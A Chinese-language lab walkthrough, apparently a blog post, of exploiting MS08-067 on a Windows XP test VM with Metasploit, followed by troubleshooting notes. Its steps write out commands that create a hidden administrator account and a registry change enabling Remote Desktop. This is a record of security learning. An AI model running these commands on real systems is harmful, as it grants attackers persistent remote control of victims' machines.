利用ms08-067漏洞远程控制Windowsxp

1、查找ms08-067：



2、使用:



3、选择payload：（开始我用的windows/shell/...和windows/meterpreter/reverse_tpc有区别）



4、查看options（yes为必填部分）:



5、输入RHOST（目标靶机）IP和LHOST的IP：



6、查看适合的系统类型（简体中文sp3，编号34）：



7、可选target 0（自动）或自己选择：



8、exploit（图中IP是后来改的，原先是192.168.199.139）（问号是因为中、英文编码不通？所以攻击机命令靶机也无法正常获得执行）：



9、获得靶机cmd：shell
10、查看端口打开情况：


11、新建用户: net user 用户名 密码 /add

12、将新用户添加到administation分组（提升到管理员权限）：net localgroup administrators 用户名  /add
13、开启3389端口：REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
14、局域网内用户都可远程控制此靶机：mstsc



15、问题总结：
   首先，靶机的安装遇到了一些难题：windowsxp有的版本已经打过补丁，我尝试过找旧版本和卸载补丁，没成功，百度的方法不适应。最后发现之前安装的xp满足要求，是因为联网的问题导致的失败；
   联网问题：NAT模式自动获取IP（开启dhcp服务），桥接模式手动配IP。进行期间断网或者更换联网方式，应当对IP进行查看修改。
   还有一个问题，打开的Windows shell不能使用上下左右键